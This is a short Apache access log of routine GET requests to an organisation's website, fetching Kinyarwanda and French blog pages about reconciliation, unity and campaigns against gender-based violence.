34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/index.html HTTP/1.1" 404 - "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/vision.php HTTP/1.1" 200 15140 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-abayobozi-bo-mu-nzego-zibanze-barishimira-politiki-yo-gukemura-amakimbirane-hatisunzwe-inkiko HTTP/1.1" 200 18184 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:48 +0200] "GET /kin/blog-detail.php?title=kayonza:-barishimira-umusaruro-wamaboko-mahire-batojwe-na-ami-mu-rugendo-rwubumwe-nubudaheranwa HTTP/1.1" 200 21180 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:49 +0200] "GET /kin/blog-detail.php?title=huye-gishamvu:--ami-yitabiriye-ihuriro-ryubumwe-nubudaheranwa-ryagaragarijwemo-intambwe-imaze-guterwa-nahakiri-imbogamizi HTTP/1.1" 200 20888 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
34.174.248.16 - - [16/Sep/2025:01:14:49 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-bashimye-uruhare-rwa-ami-mu-bukangurambaga-bwo-kurwanya-ihohoterwa-rishingiye-ku-gitsina HTTP/1.1" 200 18021 "https://google.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
197.243.3.197 - - [16/Sep/2025:01:15:11 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
34.174.50.133 - - [16/Sep/2025:01:16:21 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
34.174.50.133 - - [16/Sep/2025:01:16:22 +0200] "GET /blog-detail.php?title=histoire-de-succ%C3%A8s-et-quelques-t%C3%A9moignages-des-b%C3%A9n%C3%A9ficiaires-de-l%E2%80%99ami- HTTP/1.1" 200 29732 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
34.174.50.133 - - [16/Sep/2025:01:16:22 +0200] "GET /kin/index.php HTTP/1.1" 200 73632 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
34.174.50.133 - - [16/Sep/2025:01:16:23 +0200] "GET /promotion_of_the_reconciliation_process_and_non_violent_conflict_resolution.php HTTP/1.1" 200 15976 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0"
